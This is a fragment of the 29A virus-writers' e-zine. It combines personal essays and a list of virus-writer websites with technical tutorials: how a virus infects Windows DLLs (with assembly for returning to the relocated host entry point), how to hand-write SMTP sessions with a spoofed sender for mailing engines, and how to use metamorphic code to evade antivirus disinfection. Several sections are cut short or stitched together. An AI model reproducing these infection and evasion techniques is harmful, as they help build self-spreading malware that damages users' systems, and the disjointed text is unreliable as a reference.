ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄ´ What happened then? ³ÄÄÄÄÄ¿
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ ³
³ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³ ³
ÀÄÄÄÄÄÄ>³ What happened then? I also had to wake up early, becoz I went with³
³ GriYo and Maia to Prague to the airport. Also GigaByte, although ³
³ she was leaving in the afternoon, she wanted to see us for the ³
³ last time. GriYo and Maia went to Amsterdam, where was the next ³
³ meeting (it was the 6th of August). I also went to Amsterdam, in ³
³ the 9th of August. I stayed there at Rajaat's house. ³
³ In the 10th of August, when I arrived to Amsterdam (together with ³
³ my friend), I had the meeting with GriYo and Maia in one coffeshop³
³ near the busstation. We smoked a lot, finally, again in Amsterdam,³
³ in the most beautiful city in the world. Unfortunately, we didn't ³
³ meet anymore, becoz of my mobil-phone, that crap (heh, when I ³
³ arrived back to .cz, the 2nd day some gipsy stole me that :/). ³
³ At Rajaat's house we smoked about 20 joints per a day, and also ³
³ ate magic mushrooms. That was really very nice time. ³
³ Well, from the 31st of July to the 17th of August, I had the best ³
³ time of my life. ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄ´ Final words ³ÄÄÄÄÄ¿
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ ³
³ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³ ³
ÀÄÄÄÄÄÄ>³ When I was writting this article, I forgot many details of the ³
³ meeting. Perhaps, I forgot to write about one day, perhaps I ³
³ wrote about non-existing day (becoz of drugs and my fantasy :), ³
³ perhaps it happened in another days, then I wrote. ³
³ Perhaps nothing happened and it was only dream. However, it was ³
³ really nice dream. Thnx my friends! ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ "A Bucket Of Letters" ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄ[ (featuring passages from "War of the Worlds" by George Wells) ]ÄÄÄÄÄÄ
[ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ]
"No one would have believed, in the last years of the nineteenth
century, that human affairs were being watched from the timeless
worlds of space. No one could have dreamed we were being
scrutinized, as someone with a microscope studies creatures that
swarm and multiply in a drop of water. Few men even considered the
possibility of life on other planets and yet, across the gulf of
space, minds immeasurably superior to ours regarded this Earth
with envious eyes, and slowly and surely, they drew their plans
against us."
I would like to ask all of you: do you feel in charge of your own
life? Do you feel that you are the Master of your own self? Do you think
that your life is something that you control and never shall it escape of
your grip? Do you feel this? Then, you are either no more than 18 years old
or you are the President of the United States (even here there could be some
problems). Let me tell you, guys, which are the few priorities people have
in their life, and I will explain in a second how all this crap I write
links to viruses and 29A. So, the priorities are as follow:
1. family
2. job
3. hobbies
This is as shortly as one could put it. Family always comes first:
this is because you are borne with your family, then you choose your family
when you get married and furthermore you make your own family when you have
kids. So for something that is as much random as non-random, it must be on
the first place. Job, of course comes second, because job means money, means
social protection, means development. And by means of job you are able to
support your first priority family and your third priority, the hobbies. On
the last place come your own hobbies. It is more than obvious why: job takes
most of you time, family gets the rest of the free time and only a small,
small part of what is still free is left for your own hobbies... Did you
notice that? Did you notice that even IF you consider that the family and
the job are the most important things for you, you feel the biggest
frustration whenever you are not able to fulfill the least important one:
the hobbies... But this is very logical! People are individuals! Individuals
have personality! Personality leads to an unconscious desire of fulfilling
your OWN dreams, your OWN pleasures, your OWN hobbies...
"And that's how it was for the next ten nights. A flare, spurting
out from Mars - bright green, drawing a green mist behind it - a
beautiful, but somehow disturbing sight. Ogilvy, the astronomer,
assured me we were in no danger. He was convinced there could be no
living thing on that remote, forbidding planet."
You will not believe me, but it's the truth: as I was writing this
article my mother bursted into the room kicking and screaming that I don't
let her read some email message from my sister and I am just "playing" on
the computer... See what I mean? THEY are always more important... It
doesn't even matter that it's my computer! It doesn't even matter that it's
my e-mail address... All that matter is for "THEM" to achieve their goals...
Life is a shit!
"A few young men crept closer to the pit. A tall funnel rose, then
an invisible ray of heat leapt from man to man and there was a
bright glare, as each was instantly turned to fire. Every tree and
bush became a mass of flames at the touch of this savage,
unearthly Heat Ray. When the smoke cleared, the little steamer had
reached the misty horizon, and Carrie was safe. But the Thunder
Child had vanished forever, taking with her man's last hope of
victory. The leaden sky was lit by green flashes, cylinder following
cylinder, and no one and nothing was left now to fight them. The
Earth belonged to the Martians."
What is the most annoying is that you will always feel incapable of
doing anything about it... I think that children should be told when they
are borne: hey, kido! It's not long until you will not be able to desire
anything, so ask for everything now when you still can! But, of course,
where would be the fun of discovering life? Some say that idiots learn by
themselves and smart people learn from the others. Well, personally I think
that it's a combination of the two... Somewhere in the middle...
"That evening, there was a violent crash and I realized with horror
that my home was now within range of the Martian's Heat Ray. At
dawn, a falling star with a trail of green mist landed with a flash
like summer lightning. This was the second cylinder.[...]
Never before in the history of the world had such a mass of human
beings moved and suffered together. This was no disciplined march -
it was a stampede - without order and without a goal, six million
people unarmed and unprovisioned, driving headlong. It was the
beginning of the rout of civilization, of the massacre of mankind."
So, after this surely boring dissertation let me tell you why do I
feel this way... Briefly this is what I wanted to release in the new issue
of 29A: a metamorphic engine, a polymorphic engine, a compression engine,
three viruses and at least 4 articles. I have started all of them as follow:
1. Engines
a. Metamorphozis
b. Modularis
c. Lord Julus's Lev-Zimpel Compression Engine
4. Viruses
a. Win32.Rammstein
b. Win32.Guyana
c. Win32.SSS (SunSet Superman)
5. Articles
a. Compression part II
b. Metamorphism
c. Backdoors
d. Local network infection
e. Using errors under win32
6. Utilities
a. BeholdPE
I am quite sure that my friends in the 29A Group, all of them great
guys, felt that I kinda drifted away from the group as my messages came
always late, they were less, my contributions don't come in time... Anyway,
I have to thank all of them for being so patient and I hope that this
article explains most of these things...
"A fifth Machine appeared on the far bank. It raised itself to full
height, flourished the funnel high in the air - and the ghostly,
terrible Heat Ray struck the town. As it struck, all five Fighting
Machines exulted, emitting deafening howls which roare d like
thunder. [...] With a white flash, the Heat Ray swept across the
river. Scalded, half- blinded and agonized, I staggered through
leaping, hissing water towards the shore. I fell helplessly, in full
sight of the Martians, expecting nothing but death."
What can one expect to fulfill his desires than a miracle? No, don't
laugh! It's a reality... Nowadays, you need a miracle to allow you to
fulfill your dreams... Ok, you might think: look at this pathetic guy... his
dreams are a poly engine and some articles... Yes! So WHAT?!? Who the fuck
cares what my dreams are?!? My dreams are MY DREAMS and I want to fulfill
them... If I wanted to raise ants I would raise ants... If I wanted to build
a pyramid I would dedicate my whole life to that desire!!! It's human
nature, people! We want to do what we like to do! It is how we are built!
"I looked up and saw a third machine. It was erect and motionless,
like the others. An insane resolve possessed me I would give my life
to the Martians, here and now. I marched recklessly towards the
Titan and saw that a multitude of black birds was circ ling and
clustering about the hood. I began running along the road. I felt no
fear, only a wild, trembling exultation, as I ran up the hill
towards, the motionless monster. Out of the hood hung red shreds, at
which the hungry birds now pecked and tore. I scrambled up to the
crest of Primrose Hill, and the Martian's camp was below me. A
mighty space it was, and scattered about it, in their overturned
machines, were the Martians - dead... slain, after all man's devices
had failed, by the humblest things upon the Earth, Bacteria. Minute,
invisible, bacteria!"
I hope you did not get TOO bored of this long and full of tears
article... But this is the mood I am into and this is what I transmit to
you... I hope also that you had the time to read the passages from the "War
of the Worlds". It shows you how a so pride kind like the humankind can be
defeated in a few seconds if it is not careful enough... It also shows how
it can find escape by something that people always considered and enemy...
It proves that no matter how much you think things, no matter how long you
make your plans, there will always be something that will tear-up your
plans... And still, there will always be hope that somewhere, sometime,
whenever you expect less something will arise and help you out... Maybe even
something that you considered harmful...
So, here I am, hoping that someday I will be able to fulfill all of
my dreams!
These were the words from Lord Julus... Stay well, everybody!!!
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Lord Julus / 29A ³Û
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÛ
ßßßßßßßßßßßßßßßßßßßßßßßßßßß
Reference guide to VX sites
by VirusBuster/29A
Virus coders
------------
BeLiAL: http://home.foni.net/~belial/
Benny: http://benny29a.cjb.net
Bhunji: http://home.swipnet.se/bhunji/
Bumblebee: http://www.bbbee.cjb.net
CyberShadow: http://www.coderz.net/ABS/
Darkman: http://www.coderz.net/darkman
Del_Armg0: http://www.delly.fr.st/
Eddow: http://members.xoom.com/Eddow/index.html
Evul: http://www.coderz.net/evul
f0re: http://f0re.cjb.net/
FRiZER: http://frizer.tsx.org
GigaByte: http://www.coderz.net/gigabyte
GriYo: http://www.bi0.net
Knowdeth: http://www.coderz.net/metaphase/knowdeth/
LiFEwiRE: http://www.coderz.net/lifewire/
Mandragore: http://www.multimania.com/mdrg/
Nigromant: http://www.fortunecity.com/skyscraper/ethernet/94/neurotic.htm
nucleii: http://www.coderz.net/nucleii
Paddingx: http://paddingx.cjb.net/
Prizzy: http://prizzy.cjb.net/
Psyclone X: http://macros.gq.nu/
Radix16: http://www.volny.cz/radix16/
Raid: http://www.coderz.net/Raid
Rajaat: http://www.shadowvx.com/rajaat
R-E-V: http://www.coderz.net/rev/
SMOOTHiE: http://SMOOTHiE.gq.nu/
Snakebyte: http://www.coderz.net/Snakebyte
Toro: http://www.shadowvx.com/toro/
Ultras: http://www.coderz.net/ultras
VxFaeRie: http://www.coderz.net/vxf
Wintermute: http://personal5.iddeo.es/wintrmute/indice.htm
Yello: http://www.yello.8k.com/
ZeMacroKiller98: http://www.crosswinds.net/~zemacrokiller98/index.htm
Z0MBiE: http://z0mbie.cjb.net/
Virus Collectors
----------------
Algol: http://www.geocities.com/algol_p/
Apoc: http://aappoocc.virtualave.net
BaidareW: http://www.free-hosting.lt/virii/
ByteSurgeon: http://www.geocities.com/ByteSurgeon/
Cyphonix: http://www.geocities.com/cyphonix/
Daniel: http://www.coderz.net/daniel
HomeSlice: http://www.coderz.net/homeslice
Newton: http://www.coderz.net/newton/
PastolVX: http://www.coderz.net/pastolvx
Perikles: http://jupiter.spaceports.com/~perikles
Phage: http://www.shadowvx.com/phage/
Quilb: http://logs.quilb.net/
raenius: http://www.shadowvx.com/raenius
RDX_: http://www.coderz.net/RDX_/
Roadkil: http://www.coderz.net/Roadkil/
Specter: http://www.shadowvx.com/specter/
Sph1nx: http://sph1nx.cjb.net/
Staggle: http://www.shadowvx.com/staggle/
Tally: http://www.coderz.net/tally/
VEiN: http://home.wirefire.com/nathan/
Virax: http://welcome.to/Virax
VirusBuster: http://vtc.cjb.net
VirusP: http://www.shadowvx.com/virusp/
vxcod3: http://www.shadowvx.com/vxcod3
Worf: http://moon.zlin.vutbr.cz/~mimi/frame.html
Zordhak: http://www.coderz.net/zordhak/
VX Groups
---------
* (Asterix): http://virus.cyberspace.sk/
29A: http://www.coderz.net/29A
astigmatiZm: http://astigmatizm.cjb.net/
IKX: http://www.ikx4ever.org
MATRiX: http://www.coderz.net/matrix/
4Q: http://shadowvx.com/4Q
Alta-Virus: http://altavirus.cjb.net/
Chili: http://www.crosswinds.net/~chili/
darkbyte: http://www.darkbyte1.cjb.net/
GeneCode: http://members.xoom.com/genecode/cgi/
Mist: http://www.misttsim.org/
PhreakX: http://www.vxnews.8m.com/
Recoder: http://www.halyava.ru/recoder
Slumdung: http://biocd.cjb.net/
Spyda: http://www.coderz.net/spyda/
VX Heavens: http://vx.netlux.org/
VX India: http://www.vxi.cjb.net/
VX News: http://www.coderz.net/vxnews/
Final note:
If your site is not listed and you would like it's present on next 29A issue
send an email to darknode@oninet.es informing about your site.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Generally about VX scene ³
³ (from the psychedelic point of view) ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Thanx goez to ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Timothy Leary, The Beat generation, Skag and whole sixties yearz for giving me
inspiration about the sence of the life. Thank god for all psychedelic drugz he
gave us...
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Fux goez to ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Idiotic human beingz that can't understand that they are NOT the center of
the universe. To that ppl that keep their mind closed and absolutelly don't
want to accept other'z opinionz and basic rightz. If you want to stay dumb
for the rest of your life then continue, do it! But don't touch my right - to
do whatever I want to do with myself - even with my brain, which you can NOT
and will NOT ever control... Fuck you!
ÚÄÄÄÄÄÄÄ¿
³ Intro ³
ÀÄÄÄÄÄÄÄÙ
Another stoned article about vx scene? Yep, the second one :-) To beginnerz I
still have something to say. I really l0ve vx scene, becoz it bringz to my life
many happy momentz...
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ What'sa go? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
In this capitalistic world where the "rich" is everyone who has money, "smart"
who has white skin and lives in USA and "weird" and prosecuted the one who does
not agree with this kinda "humanity" is unbelieveable that there can exist
any other world, where the money, color of skin and nationality does not mean
anything...
I'm human from blood and bonez. Like everybody. When I entered VX scene, I was
mentaly young. I had many expectationz and ideaz of many thingz. But like the
life was going on, I changed many pointz of viewz... many ideaz. I started to
think about the sense of life. Sense of life is imho not about having money,
having a well payed job, expensive car and to be a member of yacht club. The
sense of life is to make the life itself happy to you. Everything is relative
from the viewpoint which you are looking from...
I believe the world is personal thing. Everybody percepts the world another
way... if you will do what you like, the world became better. Better for you.
Maybe you will say "better for you, but not better for otherz". False.
What is the universe? What is the world? What is wrong and what is right? It's
indiviual. If you like to code viruses and you don't cause damages to otherz,
if it is your fun and if you are happy when you code viruses, there's no
better thing to do than continue with it. If you like to help other ppl, if
you will happy when you are doing it, then do it. After all, when you will
lay on the bed of death, "noone" will ask you how much money have you earned,
how many people you pushed yer own ideaz or how many children have you made.
The "noone" will ask you if you think you lived well or not.
Finally, like the life goes on, I'm thinking about the past, about the presence
and the future... I've found out that the best I can do is do what I like to do.
The world will change to better if you will change to better... Becoz what is
world? The world is what you can see... And if you will become happy, if you
will do what you really, but really like to do, the world will be better.
Sometimez, people can't find the real sense of life becoz they have no choicez.
Some ppl, working in some big company, have the sense of life to wake up early,
go to work, then to pub and to home. Every day the same. Do you think they are
happy? I don't think so. But that's their problem... if they won't find out
that something is wrong, they won't ever find the real sense of life. But if
someone thinks that something is wrong with them, it's the start of big
journey. Don't become lost existence.
My advice is: explore you own mind. Open your mind to yourself. Think about
yourself. Find what you like to do, becoz you live here only once, the work
is not everything. The world will be the same how you will make it. Try to
be happy from little thingz... be happy with yourself. Trust yourself. Love
yourself (but don't be egoist). But you have to mean it seriously, truely and
you have to believe it from your heart. Do the right thingz - do what you like
to do, do what makes you happy, coz if you will be happy with your life, the
world will be happy with you...
My own, happy world, where I am exactly the one who I really am, is the VX
scene. The coding of artificial life. Being with real friendz and make the real
thingz. And which is your own happy world?
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
# Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿
@ benny_29a@privacyx.com ³
@ http://benny29a.cjb.net ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Considerations Infecting 32bits Libraries For Windows
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
by Bumblebee/29a
Introduction
ÄÄÄÄÄÄÄÄÄÄÄÄ
People thinks PE DLL files are the same than PE EXE files, but this is
not 100% right. The format it's the same, but not the way the files
works. I've noticed that coding DLL infectors ;)
This is a little article that shows you some tips you must take into
account while infecting this kind of PE files.
What is a DLL?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In first place don't think DLL are only files with the DLL extension.
In your system there are different extensions that hides DLLs: CPL, AX,
ACM, ...
Let me hack this little description of DLLs from the Win32 SDK:
Considerations
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The first point we get from the description say us the DLL will be
relocated very often. We must think this will happen EVER. So we cannot
rely in jumps to DLLEP (host entry point) to return control to infected
program. We need to relocate this address. Nice way to do it could be:
lea esi,virusBegin+ebp
sub esi,dword ptr [calculatedVirusBegin+ebp]
add dword ptr [DLLEP+ebp],esi
virusBegin -> where the virus starts to run
calculatedVirusBegin -> EP calculated for the virus in the infection
process.
DLLEP -> old entry point
Let's imagine we infect a DLL with image base 70000000h and the DLLEP
7000d000h (Entry Point+Image Base). We put our virus at the end of the
last section and its RVA is 7001e000h. We patch the header and put the
entry point 0001e000h. At this point we save our calculated EP and the
old DLLEP (7001e000h and 7000d000h). Later when this DLL is executed
our virus does it's work and need to return to the original code. But
we cannot rely the DLL it's loaded at 70000000h so we cannot jump to
7000d000h (old EP). Now the previous code rules. You get your current
EP by the way of the delta offset (into ebp in the example). Then you
sub the supposed virus EP (7001e000h) and then you get the displacement
of the DLLEP. This is simple and could be done in several ways.
But this first point gives us more things to think in. The DLL uses
some things from the caller environment:
Now let's go into second point. The fact that several applications can
use the same DLL requires the DLL has a way to manage that work. The
DLLEP has the following spezial structure:
HINSTANCE hinstDLL -
This is a handle to the DLL.
DWORD fdwReason -
This is a flag that shows the DLL why DLLEP is called. This is a very
important point. Indicates one of the following:
LPVOID lpvReserved -
Indicates some parametres to DLL initialization and cleanup.
As you can see fdwReason is very important and show us a very, very
important point: the DLLEP could be (and it will be) called more than
once.
You must take this into account. Your virus will be called more than
once and this could be very fucking in encrypted viruses. In non-enc
viruses there is no problem in 1st instance. But... what happens if
your decrypts twice? hehehe.
We could rid of this problem patching the virus to return host if it
called more than once or verifing the virus is decrypted to not do it
again. Make yourself.
At last we have they can share code. No problem. There is not anythin
you cannot check in section properties.
But experience gave me another points. It's possible a DLL has
NO CODE! Imagine what happens if you infect a DLL that only has
resurces ;) This is easy to check: just look code base is not equal to
zero, as example.
Last words
ÄÄÄÄÄÄÄÄÄÄ
I feel DLL infection very useful and not very complex if you care
of some points. And now with this article you can ;)
Most programs does all its work by DLLs and the main EXE file it's
only for the GUI. So DLL infection with per-process residency it's a
great choice.
I hope you've found this article interesting.
INDEX
1. Overview
2. Syntaxis
3. Client messages
4. Server messages
5. Practice
6. Experience
1. Overview
ÄÄÄÄÄÄÄÄÄÄÄ
This little guide explains how to send a mail using this protocol
and some tricks you can use in the process. Most of this
information can be found in the internet RFC821. Moreover there are
some tips you can get only from the experience. This is a guide and
the full information of the protocol is not avaliable but the
needed to send a mail succesfuly.
2. Syntaxis
ÄÄÄÄÄÄÄÄÄÄÄ
Client messages:
HELO [host][CRLF]
MAIL FROM:[address][CRLF]
RCPT TO:[address][CRLF]
DATA[CRLF]
[multi-line]
[CRLF].[CRLF]
QUIT[CRLF]
Server responses:
Some particular:
220<string>[CRLF] := Service ready
250<string>[CRLF] := Requested action okay
221<string>[CRLF] := Closing transmission
251<string>[CRLF] := Fowarding mail
354<string>[CRLF] := Start main input
3. Client messages
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
HELO [host][CRLF]
MAIL FROM:[address][CRLF]
RCPT TO:[address][CRLF]
DATA[CRLF]
[multi-line]
[CRLF].[CRLF]
QUIT[CRLF]
This is used to close the session with the server. This
command ends with disconnection and with the 221 response.
Notice that several servers wait until you close the session
to process the mail to make sure you close the session in the
right way, not closing the connection in dirty way.
4. Server messages
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Practice
ÄÄÄÄÄÄÄÄÄÄÄ
The SMTP server are listening port 25. So you can connect by:
telnet smtp.server.dom 25
Try with a server that has SMTP. Most web based mail systems have
an address different of the one you use to send mail, so this could
not be a good idea. But test it simply connecting to port 25. Try
with mail.hotmail.com (not www.hotmail.com cause this is for HTTP),
but i'm not sure if it will work.
We are going to assume you connected without problems. Let's use
C for client and S for server. This could be your session:
C: MAIL FROM:<bumblebee@microsoft.com>
S: 250 OK
C: RCPT TO:<support@avp.com>
S: 251 User not local; will forward to support@avp.com
C: DATA
S: 354 Start mail input; end with <CRLF>.<CRLF>
C: Hi AVP people!
C: Are you Anti Viral Perverts?
C: .
S: 250 OK
C: QUIT
S: 221 SMTP.SERVER.DOM Service closing transmission channel
Simple, isn't it? Make different tests. Now you only need to code
your own engine!
6. Experience
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
There are some things the official documentation doesn't say and
you must take into accout to avoid problems:
That's all. I hope you've found this article interesting and useful.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
(disclaimer)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛßßßßßßßßßßßßÛÍ»
Û Foreword Û º
ÛÜÜÜÜÜÜÜÜÜÜÜÜÛ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍͼ
I hope you will enjoy this article. If so, please drop me a note at
my e-mail address: lordjulus@geocities.com. I am always ready to hear new
infos and theories.
ÛßßßßßßßßßßÛÍ»
Û Basics Û º
ÛÜÜÜÜÜÜÜÜÜÜÛ º
ÈÍÍÍÍÍÍÍÍÍÍͼ
Literaly, the term "metamorphism" is wrongly used in relation with
code. By the definition given in the Webster, "metamorphism" means the
following: "change in the mineralogical, structural, or textural composition
of rocks under pressure, heat, chemical action, etc., which turns limestone
into marble, granite into gneiss, etc."
Basically all the above values are stored inside your code at a
certain address. Things like these are most common:
OldEip dd 0
...
mov dword ptr [ebp+OldEip], eax
The human will look in your code and when he finally locates and
understands the above lines he will program his automatic code to look at
the address of OldEip and get the value from there. There's no need for
human interference when scanning for such a simple thing. Now the software
has located the original eip of the infected program and can safely remove
your hook just by restoring it. This is just a very simple way of
disinfecting.
ÛßßßßßßßßßßßßÛÍ»
Û Methods Û º
ÛÜÜÜÜÜÜÜÜÜÜÜÜÛ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍͼ
Let's imagine that you replace the above codings with this:
OldEip1 dd 0
...
OldEip2 dd 0
...
OldEip3 dd 0
Where does it lead? Everytime the virus propagates the place where
the old entrypoint is stored will be different... And also, the instruction
that accesses it will differ from generation to generation. I don't know if
you realise the strength of this thing. Of course it is easily beatable by
locating the access instruction itself and getting the address from there.
But, think of this:
Oldeip1 dd 0
...
Oldeip2 dd 0
...
...
codeaddress1 dd 0
...
codeaddress2 dd 0
...
...
Now, the two instructions both look like this when debugged:
mov [ebp+XXXXXXX], eax
You will say, no problem... if one can locate the metamorphic engine
he can decipher your code... Think so? Read furthure on the implementation
of the engine. Now let's check some other ways of using metamorphism.
This is a little bit tricky and you have to learn a little about
instruction lengths. It's not very hard, but you will have to create it by
testing it many times under a debugger. Remember that here you are not
generating a polymorphic decryptor (where you have an empty buffer and you
can fill it downwards), but you are working in compiled code that has a
definitive size and links all over. The idea is to modify a certain
instruction so that it cannot be located easily.
For this you will need to save some space in different parts of your
code and they should look somehow like a subroutine:
place1 proc
space1 db 20 dup(90h)
ret
place1 endp
You can have, let's say, around 10 places for each part of
metamorphic code. Whenever this instruction is to be called you must
rearrange the call to it. Imagine for the above:
call place1
...
place1 proc
mov [ebp+OldEip1], eax
ret
place1 endp
This is the first idea: your instruction can roam around the code.
Think that you can have let's say 15 places like that and 10 or more
instruction to metamorph. Your random number generator will choose a place
for each one and still you will have some left to fill with junk.
Here you need to take care of the instruction length. As you noticed
I choosed randomly the size for a place to 20 bytes (btw: you may have
different place sizes). This means that you cannot put an instruction or
group of instructions there longer than 20 bytes, because otherwise they
will overwrite the code that follows.
Now, your random number generator will choose one of the above
instruction and will simply fill in it's place. What does this bring? It
makes it even harder for the automatic scanner (provided that it can look up
all the places) to know which address are you addressing (oldeip1, 2,
etc...).
ÛßßßßßßßßßßßßÛÍ»
Û Briefing Û º
ÛÜÜÜÜÜÜÜÜÜÜÜÜÛ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍͼ
For the moment let's take a break and see what all the above can
generate:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ call placeX ³
ÀÄÄÄÄÄÄÂÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄ¿
³ ³ ³ ³ ³ ³ ³ ³ ³
US US US US US US US US US
ÚÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄ¿
³place1³³place2³³place3³³place4³³place5³³place6³³place7³³place8³³place9³
ÀÄÄÄÂÄÄÙÀÄÄÄÂÄÄÙÀÄÄÄÂÄÄÙÀÄÄÄÂÄÄÙÀÄÄÄÂÄÄÙÀÄÄÄÂÄÄÙÀÄÄÄÂÄÄÙÀÄÄÄÂÄÄÙÀÄÄÄÂÄÄÙ
ÀÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÙ
US
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄ¿
³ i1 ³³ i2 ³³ i3 ³³ i4 ³
ÀÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
US
ÚÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄ¿
